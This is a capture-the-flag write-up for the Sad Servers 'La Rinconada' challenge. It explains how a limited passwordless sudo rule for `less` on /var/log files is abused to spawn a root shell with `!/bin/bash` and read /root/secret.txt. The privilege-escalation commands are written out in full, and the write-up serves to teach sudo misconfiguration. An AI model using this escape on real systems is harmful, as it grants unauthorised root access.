La Rinconada - Advent of Sysadmin 2025

This is part of Sad Servers' Advent of Sysadmin 2025 series.

I'm doing each challenge every day and I'm publishing a quick write up for each one every day.

Spoiler alert! This gives the solution to the challenge. If you want to do it on your own, stop reading.

Challenge details

Scenario: "La Rinconada": Elevating privileges

Level: Medium

Type: Hack

Tags: hack   advent2025

Access: Email

Description: You are logged in as the user "admin" without general "sudo" privileges. The system administrator has granted you limited "sudo" access; this was intended to allow you to read log files.

Your mission is to find a way to exploit this limited sudo permission to gain a full root shell and read the secret file at /root/secret.txt Copy the content of /root/secret.txt into the /home/admin/solution.txt file, for example: cat /root/secret.txt > /home/admin/solution.txt (the "admin" user must be able to read the file).

Root (sudo) Access: False

Test: As the user "admin", md5sum /home/admin/solution.txt returns 52a55258e4d530489ffe0cc4cf02030c (we also accept the hash of the same secret string without an ending newline).

The "Check My Solution" button runs the script /home/admin/agent/check.sh, which you can see and execute.

Time to Solve: 15 minutes.

Cool little challenge to learn how to break out of a restricted shell when you have limited sudo access.

Start by listing what sudo access our user has:

admin@i-0adfc7a1f5cd64cfb:~$ whoami
admin

admin@i-0adfc7a1f5cd64cfb:~$ sudo -l
Matching Defaults entries for admin on i-0adfc7a1f5cd64cfb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User admin may run the following commands on i-0adfc7a1f5cd64cfb:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/less /var/log/*

The challenge description hinted at the fact that we could read some logs. As shown by the sudo -l command, we can use less to open files in /var/log/* as root without any password.

less is a pager that displays file content in a terminal window. Its commands are based on vi and vim. But this is where it gets interesting: while reading a file in less, you can invoke shell commands just like you would in vi. less spawns a shell to run whatever command you pass in. Since we're running less as root via sudo, any spawned shell inherits those root privileges.

less(1) - Linux manual page

That means we can get a root shell from within less.

sudo less /var/log/dpkg.log # file will open in less, showing first lines

!whoami # type this once you're in less

root

!done (press RETURN) # pressing return to go back to less

!/bin/bash # type this to get an interactive shell as root

We can actually run the command from the challenge description directly from less. No need to enter a sub-shell:

sudo less /var/log/dpkg.log

!cat /root/secret.txt > /home/admin/solution.txt

And that's it. We escaped the limited shell and got the secret. 🚩

Here's some great resources about escaping restricted shells: